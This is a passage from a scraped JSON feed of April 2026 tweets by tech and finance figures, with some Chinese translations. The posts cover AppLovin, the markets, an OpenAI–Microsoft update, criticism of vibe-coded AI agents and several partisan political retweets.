says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048761760971096534#m", + "published_at": "2026-04-27T13:50:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00", + "source": "nitter", + "title_zh": "我们已更新与微软的合作协议。微软将继续作为我们的主要云服务合作伙伴,但在所有云平台上都可以获取我们的产品及服务。我们承诺持续提供模型及相关产品直至2032年,并与微软保持收益分成直至2030年。" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", + "url": "https://nitter.net/charliebilello/status/2048753179471323584#m", + "published_at": "2026-04-27T13:16:36+00:00", + "source": "nitter", + "title_zh": "标普500的周期调整市盈率(CAPE Ratio)已升至41,创2000年以来新高,目前估值水平超过历史99%的时期。$SPX 相关视频:https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048751094671585397#m", + "published_at": "2026-04-27T13:08:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", + "url": "https://nitter.net/PeterMallouk/status/2048747238986305979#m", + "published_at": "2026-04-27T12:53:00+00:00", + "source": "nitter", + "title_zh": "转发@charliebilello:想知道哪个月分是投资的最佳时机?正确答案是每个月都是!开始行动就是最佳时机。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Enables streaming, gaming, video calls & real-time work onboard\n\n• Rollout begins in 2026 as part of fleet-wide upgrade\n\nA major leap in aviation connectivity 🚀", + "url": "https://nitter.net/cb_doge/status/2048744214230712500#m", + "published_at": "2026-04-27T12:40:59+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", + "url": "https://nitter.net/KatieMiller/status/2048727747954868342#m", + "published_at": "2026-04-27T11:35:33+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted to remove him from state ballots. \n\nWhen all of that failed they tried to assassinate him not once but four times. \n\nAnd they go on national television to talk about how we need to vote for them to save democracy.", + "url": "https://nitter.net/jason_meister/status/2048720909809156378#m", + "published_at": "2026-04-27T11:08:22+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "😳", + "url": "https://nitter.net/pmarca/status/2048677114480873657#m", + "published_at": "2026-04-27T08:14:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @BrendanEich", + "url": "https://nitter.net/pmarca/status/2048675385119019444#m", + "published_at": "2026-04-27T08:07:29+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048674564314685477#m", + "published_at": "2026-04-27T08:04:13+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", + "url": "https://nitter.net/pmarca/status/2048673940072251670#m", + "published_at": "2026-04-27T08:01:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "cc @elonmusk", + "url": "https://nitter.net/pmarca/status/2048673488383447437#m", + "published_at": "2026-04-27T07:59:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "url": "https://nitter.net/pmarca/status/2048624098398650608#m", + "published_at": "2026-04-27T04:43:41+00:00", + "source": "nitter", + "title_zh": "当某样事物变得丰富廉价时,另一样事物却会变得稀缺珍贵。" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", + "url": "https://nitter.net/pmarca/status/2048621340408844368#m", + "published_at": "2026-04-27T04:32:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://nitter.net/pmarca/status/2048620511912194339#m", + "published_at": "2026-04-27T04:29:26+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The apps can rewrite the files. 👀", + "url": "https://nitter.net/pmarca/status/2048615807190769738#m", + "published_at": "2026-04-27T04:10:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://nitter.net/pmarca/status/2048614869352714619#m", + "published_at": "2026-04-27T04:07:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "🇺🇸", + "url": "https://nitter.net/pmarca/status/2048614659595583651#m", + "published_at": "2026-04-27T04:06:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases (in the universe).", + "url": "https://nitter.net/pmarca/status/2048614305705386433#m", + "published_at": "2026-04-27T04:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://nitter.net/pmarca/status/2048612144871264609#m", + "published_at": "2026-04-27T03:56:11+00:00", + "source": "nitter", + "title_zh": "令人担忧。" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending!", + "url": "https://nitter.net/pmarca/status/2048610397243265189#m", + "published_at": "2026-04-27T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending recommending.", + "url": "https://nitter.net/pmarca/status/2048598334492033455#m", + "published_at": "2026-04-27T03:01:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048597298150875169#m", + "published_at": "2026-04-27T02:57:11+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://nitter.net/pmarca/status/2048591674688037210#m", + "published_at": "2026-04-27T02:34:50+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", + "url": "https://nitter.net/pmarca/status/2048589233095643240#m", + "published_at": "2026-04-27T02:25:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", + "url": "https://nitter.net/pmarca/status/2048573035616375134#m", + "published_at": "2026-04-27T01:20:46+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter", + "title_zh": "我们为投资团队新增了成员。这并非我计划中的事情。对方每天为团队推送3个新投资机会,连续90天毫无间断。所有机会都符合我们的投资阶段、地区和类型。这就是在VC领域积极进取获得工作的样子。敬请期待后续重磅消息。" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://nitter.net/pmarca/status/2048515643268567431#m", + "published_at": "2026-04-26T21:32:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress 